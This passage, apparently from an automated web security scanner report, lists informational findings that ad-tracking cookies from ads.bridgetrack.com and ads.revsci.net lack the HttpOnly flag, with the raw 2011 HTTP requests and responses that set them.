!!!#=%=bG!#3pS!!!!#=$G$k!#3t$!!!!#=!yui!#4O_!!!!#='ht3!#5(Y!!!!#=$G$k!#5(^!!!!#=%H`<!#5(a!!!!#=$G#u!#5(c!!!!#=%H`<!#8*]!!!!#=$G]3!#8>+!!!!#=!i9S!#:<o!!!!%=!mwU!#<,#!!!!#=%=bG!#?dj!!!!$=#qMG!#?dk!!!!$=#qMG!#C@M!!!!#=!iK@!#D![!!!!#=%if4!#D`%!!!!+='htq!#DpD!!!!#=$GZg!#Dri!!!!#=#ytJ!#H23!!!!#=%=px!#Km2!!!!#='>m<!#L$j!!!!#=#M=.!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTC!!!!+='htq!#MTF!!!!'=%=]S!#MTH!!!!-='htq!#MTI!!!!-='htq!#MTJ!!!!-='htq!#Nyi!!!!#=!eq^!#O@L!!<NC=$G$l!#O@M!!<NC=$G$l!#O_8!!!!'=$$NV!#Q_h!!!!#=%VvP!#QfM!!!!#=!eq^!#Qu0!!!!#=#T`h!#Sq>!!!!#='>m<!#T^F!!!!#=!yv!!#TnE!!!!#='htq!#UDQ!!!!-='htq!#UW*!!!!#=!dNx!#U_(!!!!#=#$.X!#V7#!!!!#='ht3!#V=G!!!!#=$$P0!#XF5!!!!#=%=bI!#]%`!!!!$='i$P!#]*j!!!!#=#pxY!#]<e!!!!#=!iHj!#]@s!!!!#=#$2P!#]Up!!!!#='htq!#]Uq!!!!#='htq!#]Uy!!!!#='htq!#]Z!!!!!*=(5yj!#]Z#!!!!'=(5yj!#]w)!!!!+='htq!#]w4!!!!)=%1p(!#]wQ!!!!(=$_d[!#]wT!!!!)=%1p(!#]x!!!!!(=$_d[!#^d6!!!!$='i$P!#_am!!!!)=#!Wq!#_wj!!!!)=#!Wq!#`-Z!!!!%='htq!#`-[!!!!%='htq!#`cS!!!!#=%id8!#aH+!!!!#='>m<!#aP0!!!!%='7bP!#a]3!!!!$=!iR@!#a^D!!!!#=$GZg!#b65!!!!#=#mS:!#b<Y!!!!#=%H`<!#b<_!!!!#=%H`<!#b<a!!!!#=$G#-!#b='!!!!#=$G#u!#b=*!!!!#=$G#-!#b=E!!!!#=%H`<!#b=F!!!!#=$G#u!#b?f!!!!(=!msh!#bBg!!!!#=!iRr!#biv!!!!#=!iK0!#c-O!!!!+=%Vw)!#c-Z!!!!#=%VYB!#c8m!!!!*=(5yj!#c8p!!!!*=(5yj!#dCX!!!!%=!c>6!#dWf!!!!#=#mS:!#eDE!!!!#=#[2T!#eSD!!!!(=$_d[!#fFG!!!!#=#T_g!#fpW!!!!#=#M=$!#fpX!!!!#=#M=$!#fpY!!!!#=#M=$!#gS,!!!!#='i$2!#h.N!!!!#=#M8b!#k[Y!!!!#=#mS:!#n`.!!!!#=$Fss!#nci!!!!#=$_di!#oTw!!!!#=#mS:!#ofW!!!!'=#!W!!#ogg!!!!#=#!Wq!#p6E!!!!#=#$.[!#p6Z!!!!#=#$.r!#pI<!!!!%=!iWP!#p]R!!!!#=$Fss!#q+A!!!!#='htq!#q2T!!!!$=#$2R!#q2U!!!!$=#$2R!#q4c!!!!$=!iWQ!#r-[!!!!#=!c8Z!#sAb!!!!$=%HZN!#sAc!!!!$=%HZN!#sAd!!!!$=%HZN!#sAf!!!!$=%HZN!#sB1!!!!$=%HZN!#sB7!!!!$=%HZN!#sBR!!!!$=%HZN!#sC4!!!!$=%HZN!#sD[!!!!$=%HZN!#slj!!!!#=#T_f!#tM)!!!!$=%=]S!#tM*!!!!$=$Ju9!#uQC!!!!+='htq!#uY<!!!!#=!yv$!#v,b!!!!#=#mS:!#v?X!!!!#=#qMG!#v?a!!!!#=#qMG!#v@3!!!!#=%=bP!#vC^!!!!#='htq!#wUS!!!!+=(68J!#wYG!!!!#=$GXv!#wcv!!!!#=$Wil!#x??!!!!$=!oL8!#xBt!!!!#=#mS:!$!@.!!!!#=#HfR!$!U7!!!!#=%=bO!$!]L!!!!#=(6?f!$#B<!!!!#=$_dh!$#BA!!!!#=$_dh!$#R7!!!!#='htq!$#X4!!!!#=#%VO!$#yu!!!!+='htq!$$K<!!!!#=#$.g!$'$#!!!!#=(0.`!$'/S!!!!#=#mS:!$'/Y!!!!#=#mS:!$(:q!!!!#=$Fss!$(Gt!!!!'=%=]S!$(Z`!!!!#=!iJp!$(ax!!!!#=#HfS!$(f7!!!!#=$_d[!$)Nf!!!!#=$GZg!$)ZR!!!!#=!i9S!$+VB!!!!#=(1IG!$+_V!!!!#=$Wj6!$,0:!!!!#=$$BQ!$,gE!!!!$=!iQt!$,jw!!!!#=#mS:!$-'0!!!!#='i$,!$-rx!!!!#=$GXw!$.#F!!!!$=#qP5!$._W!!!!#='i+,!$/F4!!!!#=(1C-!$0V+!!!!#='htq!$2?y!!!!#=(6?g"; BX=edn6q5d6t078b&b=4&s=k0&t=135

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 12:25:27 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="b!!!$^!!!?J!!!!)='htq!!(1-!!!!,='htq!!*10!!!!$=(5yj!!*lZ!!!!#=$Wj6!!*oY!!!!'=(5yj!!,WM!!!!#=$Wj6!!-?2!!!!+=(5yj!!..X!!!!'=$L=p!!/GK!!!!,='htq!!/GR!!!!,='htq!!/Ju!!!!$='htq!!/K$!!!!'='htq!!0+@!!!!#='hs@!!04a!!!!#='hs@!!1Mv!!!!#=#T]$!!2*J!!!!#=%=bB!!3ba!!!!%='7bV!!4F0!!!!'='htq!!4Rk!!!!#=!iBY!!<A!!!!!$=!iQw!!?VS!!<NC=$G$l!!J<J!!!!-='htq!!J<K!!!!-='htq!!J<O!!!!+='htq!!J<S!!!!-='htq!!Kc5!!!!#=!Y*a!!LHY!!!!$=#$2R!!PKh!!!!#=$G$!!!PL)!!!!#=$G$!!!PL`!!!!$=$G$!!!Rp$!!!!#='oUr!!Z+p!!!!#=!c8X!!ZUR!!!!#=$_dh!!Zwa!!!!+=(5yj!!Zwb!!!!'=(5yj!!]lj!!!!$=!iQw!!i5*!!!!%=!iR9!!itb!!!!-='htq!!j,.!!<NC=$G$l!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!mL?!!!!#=%=pu!!nAs!!!!#=$Wj6!!rms!!!!#=!c8X!!ry1!!!!'=!msj!!t^6!!!!%=!Tiu!!u*$!!!!%=!iXa!!x^7!!!!#=$Wj6!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#')-!!!!#=$G[5!#'hi!!!#(=$Lth!#(C#!!!!%=%3Vm!#-B#!!!!#=$G#-!#/h(!!!!(=!msk!#/m:!!!!#=!nGq!#0Ei!!!!#=$GZg!#0[r!!!!#=#32s!#16I!!<NC=$G$l!#2%T!!!!$=#pxy!#2.i!!!!#=$G$!!#2g8!!!!#=%=bG!#3pS!!!!#=$G$k!#3t$!!!!#=!yui!#4O_!!!!#='ht3!#5(Y!!!!#=$G$k!#5(^!!!!#=%H`<!#5(a!!!!#=$G#u!#5(c!!!!#=%H`<!#8*]!!!!#=$G]3!#8>+!!!!#=!i9S!#:<o!!!!%=!mwU!#<,#!!!!#=%=bG!#?dj!!!!$=#qMG!#?dk!!!!$=#qMG!#C@M!!!!#=!iK@!#D![!!!!#=%if4!#D`%!!!!+='htq!#DpD!!!!#=$GZg!#Dri!!!!#=#ytJ!#H23!!!!#=%=px!#Km2!!!!#='>m<!#L$j!!!!#=#M=.!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTC!!!!+='htq!#MTF!!!!'=%=]S!#MTH!!!!-='htq!#MTI!!!!-='htq!#MTJ!!!!-='htq!#Nyi!!!!#=!eq^!#O@L!!<NC=$G$l!#O@M!!<NC=$G$l!#O_8!!!!'=$$NV!#Q_h!!!!#=%VvP!#QfM!!!!#=!eq^!#Qu0!!!!#=#T`h!#Sq>!!!!#='>m<!#T^F!!!!#=!yv!!#TnE!!!!#='htq!#UDQ!!!!-='htq!#UW*!!!!#=!dNx!#U_(!!!!#=#$.X!#V7#!!!!#='ht3!#V=G!!!!#=$$P0!#XF5!!!!#=%=bI!#]%`!!!!$='i$P!#]*j!!!!#=#pxY!#]<e!!!!#=!iHj!#]@s!!!!#=#$2P!#]Up!!!!#='htq!#]Uq!!!!#='htq!#]Uy!!!!#='htq!#]Z!!!!!*=(5yj!#]Z#!!!!'=(5yj!#]w)!!!!+='htq!#]w4!!!!)=%1p(!#]wQ!!!!(=$_d[!#]wT!!!!)=%1p(!#]x!!!!!(=$_d[!#^d6!!!!$='i$P!#_am!!!!)=#!Wq!#_wj!!!!)=#!Wq!#`-Z!!!!%='htq!#`-[!!!!%='htq!#`cS!!!!#=%id8!#aH+!!!!#='>m<!#aP0!!!!%='7bP!#a]3!!!!$=!iR@!#a^D!!!!#=$GZg!#b65!!!!#=#mS:!#b<Y!!!!#=%H`<!#b<_!!!!#=%H`<!#b<a!!!!#=$G#-!#b='!!!!#=$G#u!#b=*!!!!#=$G#-!#b=E!!!!#=%H`<!#b=F!!!!#=$G#u!#b?f!!!!(=!msh!#bBg~~!#biv!!!!#=!iK0!#c-O!!!!+=%Vw)!#c-Z!!!!#=%VYB!#c8m!!!!*=(5yj!#c8p!!!!*=(5yj!#dCX!!!!%=!c>6!#dWf!!!!#=#mS:!#eDE!!!!#=#[2T!#eSD!!!!(=$_d[!#fFG!!!!#=#T_g!#fpW!!!!#=#M=$!#fpX!!!!#=#M=$!#fpY!!!!#=#M=$!#gS,!!!!#='i$2!#h.N!!!!#=#M8b!#k[Y!!!!#=#mS:!#n`.!!!!#=$Fss!#nci!!!!#=$_di!#oTw!!!!#=#mS:!#ofW!!!!'=#!W!!#ogg!!!!#=#!Wq!#p6E!!!!#=#$.[!#p6Z!!!!#=#$.r!#pI<!!!!%=!iWP!#p]R!!!!#=$Fss!#q+A!!!!#='htq!#q2T!!!!$=#$2R!#q2U!!!!$=#$2R!#q4c!!!!$=!iWQ!#r-[!!!!#=!c8Z!#sAb!!!!$=%HZN!#sAc!!!!$=%HZN!#sAd!!!!$=%HZN!#sAf!!!!$=%HZN!#sB1!!!!$=%HZN!#sB7!!!!$=%HZN!#sBR!!!!$=%HZN!#sC4!!!!$=%HZN!#sD[!!!!$=%HZN!#slj!!!!#=#T_f!#tM)!!!!$=%=]S!#tM*!!!!$=$Ju9!#uQC!!!!+='htq!#uY<!!!!#=!yv$!#v,b!!!!#=#mS:!#v?X!!!!#=#qMG!#v?a!!!!#=#qMG!#v@3!!!!#=%=bP!#vC^!!!!#='htq!#wUS!!!!+=(68J!#wYG!!!!#=$GXv!#wcv!!!!#=$Wil!#x??!!!!$=!oL8!#xBt!!!!#=#mS:!$!@.!!!!#=#HfR!$!U7!!!!#=%=bO!$!]L!!!!#=(6?f!$#B<!!!!#=$_dh!$#BA!!!!#=$_dh!$#R7!!!!#='htq!$#X4!!!!#=#%VO!$#yu!!!!+='htq!$$K<!!!!#=#$.g!$'$#!!!!#=(0.`!$'/S!!!!#=#mS:!$'/Y!!!!#=#mS:!$(:q!!!!#=$Fss!$(Gt!!!!'=%=]S!$(Z`!!!!#=!iJp!$(ax!!!!#=#HfS!$(f7!!!!#=$_d[!$)Nf!!!!#=$GZg!$)ZR!!!!#=!i9S!$+VB!!!!#=(1IG!$+_V!!!!#=$Wj6!$,0:!!!!#=$$BQ!$,gE!!!!$=!iQt!$,jw!!!!#=#mS:!$-'0!!!!#='i$,!$-rx!!!!#=$GXw!$.#F!!!!$=#qP5!$._W!!!!#='i+,!$/F4!!!!#=(1C-!$0V+!!!!#='htq!$2?y!!!!#=(6?g"; path=/; expires=Sat, 15-Jun-2013 12:25:27 GMT
Set-Cookie: BX=edn6q5d6t078b&b=4&s=k0&t=135; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Thu, 16 Jun 2011 12:25:27 GMT
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Age: 0
Proxy-Connection: close

GIF89a.............!.......,...........D..;

11.45. http://ads.bridgetrack.com/track/f/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.bridgetrack.com
Path:	/track/f/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

BTA144=GUID=05443B076F794FD18F0B4B508B843066; expires=Sun, 17-Jul-2011 04:00:00 GMT; path=/
BTASES=SID=2150893801FA49DAA2D7E0B26F9FC912; path=/
BTA=GUID=05443B076F794FD18F0B4B508B843066; expires=Mon, 11-Jun-2012 04:00:00 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /track/f/?id=6984&random=1308307222&VisitorID=FB8DCF93533EFDA4&PageID=CapitalOnePlatinumPrestigeExcellentCreditProduct HTTP/1.1
Host: ads.bridgetrack.com
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/creditcards/platinum-prestige-credit-card/11858/8/?linkid=WWW_1010_CARD_TGAFF01_Z_Z_01_T_CP85808EW
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BTA=GUID=05443B076F794FD18F0B4B508B843066; BTA167=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Thu, 16 Jun 2011 10:42:05 GMT
Vary: Accept-Encoding
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://ads.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: BTA144=GUID=05443B076F794FD18F0B4B508B843066; expires=Sun, 17-Jul-2011 04:00:00 GMT; path=/
Set-Cookie: BTASES=SID=2150893801FA49DAA2D7E0B26F9FC912; path=/
Set-Cookie: BTA=GUID=05443B076F794FD18F0B4B508B843066; expires=Mon, 11-Jun-2012 04:00:00 GMT; path=/
Date: Fri, 17 Jun 2011 10:42:05 GMT
Connection: close
Content-Length: 194

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"></body></html>

11.46. http://ads.revsci.net/adserver/ako previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.revsci.net
Path:	/adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsiPus_muCF="MLsXtSMNZzhvJZH0ecXcxPALrEtuUCF+EhmSrU9X53YJybh8eM9OR5om4StALLEl9sEMwok2BjeU7ig3joPvhFn375OtJgctt+dtjkn6OQtDOR/YNpbDZrI2C86hj1VY7tYYo8RaaBaN6U+uIyenKXXMFkN8vM1Z/lS6m4eQU77IgshcEhyWoB8tlYqMk+ZaLMTRqhrDz1mb9hBP5lYZ3uEkfdbSZddTzqQ1p74J22EdoSmmfIwXv1xJAKPgMi/3Lss6bfgW1FkGxfhKSNryEthxFkWZ4wGlzvn22TldGUpR649q+aHN6SRQ9QvH2mnRBQp68ePtwwG1sHHr76HDiHZBThl81IHEXyyzgkJi7+wozAWpz8HzIMEnlhGaCdL3LR4uywGjg9tIdlQDp1mBiJNyb2k+yBLEHMmyzDpnMVAbGN+0gNaMEGLVjNU1cz7SQ3j0/sdWSI21dPY8WAGjbHt5EJswul4ERAnuOOfq8zMh9OQsmuhlfVTd3+gv184YLHu+z17HWnEXuKzJDDUUBdL4KVskNSaIRFpp+dS2ocyq1f0ng5zgZqz1NX3fUPfJYWTItxy1lrHebzT1OZFh/oB4YxO4Kx2JgHEcjha2H/zRdoVQjTegWqmu1CFoyL+f0dmWA5hhqO24oy7PeG5Uv8ZxB5D/zWErqb3n1nRiDfA3VZrXZ5m85mzTdHz6WJms4pQmyIDZuTnZJ7UJlxq+rT2fgJXh+3P1SwVxH4LJNmaxVkpegJ6bFWN7atAhFFf6sed+QkJ7TfjaHfCODhtMB4U70ydJ9HqBJIeEx2KtuTUvTrOJ1shc8yKdpE+87dBtFNeI6sjwM15I0Mo2X6/TAZ+GryBzlw3c+Vr5DQkC7ov+TcK3ciwWTftY8Kp8UfIdrdMLoJjt+0gDvSjJG99TNhr2L0ZBTYBAM9dXv6rEhLMi3xYI094cGcLAl9GJyv9lr1ZgCV41MitAAgT5H3rNzFWFdtMAJ51ZrI4MBbJbZjZzKsIptr67ah1OCz3//czOHcfTlOaxLo6LXH1vnSFEYxKRuSxsS0YzCzwHXnw8sZYkdcIckmrAl21FiwA7+hBd/7YtecEvis+kwyHyEqWHSdWL7HER1TCokY8BAnlxmztwMkkHICwLAjCnQOlEVfM15v9mMmJy0cRnXR7oNEXzzDOyiEK0viyr8i+3GN2O7T2QpYVG4vuSyjlmpQiMeDTmKH1iTHbHaor4+DdT+LmSGIL2yDZ2IqmxOrRhSuztNkSu0lQh8HbOoDmuw69+f4uDxJg59a6EcpoPxCjqJlU4PsXp7o9H3z3i1xbGuE9DCriq34NC6ELK8OBwGX0E5zA293s9chhxYCLIilejX1laxpZM"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
rsi_us_1000000="pUMN4y+jOBYULQE0ur/TotBv0OXJiczDnb++8r/x9aZAxBCInYEZ/jMMNxtAxBUjF1R1o5/HgkXX/FhIvvfr+WHl5tUIizEH1qEvfY0PpxVt+Yt7nsK7nnWLbyVmnVoq+wkyqIIjotT5mhzP8D6W/yO/EWLDpnIena+gBjoZ2X5xk3FS1R2fkD1m0jLcmw3Eyq1mJmhvH4Wcdx6XoXuxNl2vZuoEDT3lQEwxZ8JblEJZfWt1tp7+PggZpQrPMNaQwXV6NwSVv/y45dn+H1VS9I2+X87boQ5mctzOOLHXMCjcC1r1UYSL8l+pU5lCEwO40F2cojUizQzC8vs5lD17nsay3T8wV95Cj1aZZeHozJtGrgi84PEvr87c2EvcrHpMXycZW5yjKsTHotVZmYnrXcMOnmIoWB4zwYRMBoh01qRCYOLnKWr0ilbhWgq3YmYIg0BQLRKaRWr6E9kEUYXOtCX8AkMEWZ/BB3ctb/0/aS1wdR3tbTGq5qcHwiXZbX+tcITF/drqn4Ohu3pPuFNjkl7hBzVpfVQsBiGHyGVAjXUoBGVFfDzXzoaA2PsJgIz9lEg7fNsgjbqvIx5Ukc5JcgM2xhhtaGYBwpXVFgRV/Xljt+yWxlUv569KS5TgelErxOgG4aXrhUP2huCfzTmlxcy9VS/n+LLYff3CoC3wllVeXF6isGPav7ROeAt7xUoX8nrQMjL8IaWj42ZwtClFb57t0+ThEZbrc5j2OQrxlDArNyoPyyqPHkQomuPXx1BFNu76/uob3zAWXCk6uvKt/hTFWKJ3TMVPLPDigzn1NeFdVUz88ARjJKLqgIQjpHOP9RnzQdp0QA469dodvjUOL7RHQQxH2X0bLie/MnwJGFNer/eDQI3bA35pCW62SiBvJSXUCHl5cUHhqzLoKJJfVZrwMzuuisVcqwPwmqZFKz5s4o7lPPntuWSCF5LOANDzcw4L2qYDyofzoHYayxYajBC03Qx3oEbuxJ1UgeNkTWWzTS2DPCv4O7nKLN7dAoJd6ODfCrYlf9UQh1FHFN67Ip/huOSwlokdliTkDW4u7GMQu3KlAt/Gd6rHoRdqCNg5gJd27+k7nz0wEiwFIjjJFz5xkWAxSyY3nPDPAF8IR1wXIXEpPdpmdhiSmzq+/PN6THNLr29fwExFY3sA9VjHrL6yboGo1ISl6QgBH+DGHcA1v6O/AjeOHPGhv7OJk9eDpe0fjIXRI7V0rr4XwqbjkcAUQgRHpd56AKFCJ7Bbmqo94f/zDaMQoYkv3eCoBIRsC4sWO9Jt8ZK/L6pt0OZjbQDMF+nvkJxiiTVvU9iRn10AUXUYrLqwLJIFYZvNdsifybhsb+/etGvwlP6dwQIG9tBNscKDO4rzJMwWEnLM7zWVPx3qUl+0fW+s+/3GaGeM77oSh3TVjKMvECHM7DrZlnYxUM9Oer8MfwxhkbYyyCYE+e7YGhTl3VAZisR0isT3ocLuw9OAZmXfi8FBouMn3xxLTiQMYe8rFQNTe1jgHq2KvHikTS7/Jwyr42GkTS9w3/UP1OQu/y4s5tIDBqzsGC5wG23JlgKlg22I22ESvFuLs1pYMpNgOhVM+LqylKzy40WaVfTxaC+K87ywrpqXk7tQPlb7EayC3UAEj0v8sDoUfeMamosvh3mryYTKLBHjjQ8ar+svv/b6qGtypmuPgDR5KSyR9ULGT7lKmBES+vs68AmuHecqLcWRvPU1BjtkUWdkAWYXMzrP3VhwhYf2Y19SFdJMBs8dVGbJYSW0gF9138D6PZIse11BYas="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_bjrC=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_SZ7X=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_evMS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_OvdF=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_7Fof=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_zYUJ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_YNkt=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_vvhk=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_J1Ps=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_b8FU=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_mB1L=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Sjxc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_IDRv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ev9c=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_X4PT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus__0fe=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_N0iX=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_D9lG=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_L6z4=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_DHsK=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_RWWj=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_5sIM=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_BYLc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_RLoX=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_qW9_=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_tUOz=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_X-Vm=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_iIbq=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_2iyk=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_GmIq=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_DDwn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_oq-t=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_GGsx=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_RHZz=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_bpJH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_FjqN=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_kTuc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_1cgA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Zj0S=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus__S9R=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_6dX6=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ERpj=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_GXWN=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_nkS4=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_qHFS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_gmtv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_DsKn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_TtGD=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_34v8=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ONLV=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_h_EP=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Z35U=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ItMH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_HIOU=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_j3RF=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_1HRX=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_GcFY=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ZM6F=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Zfml=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_s5cG=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
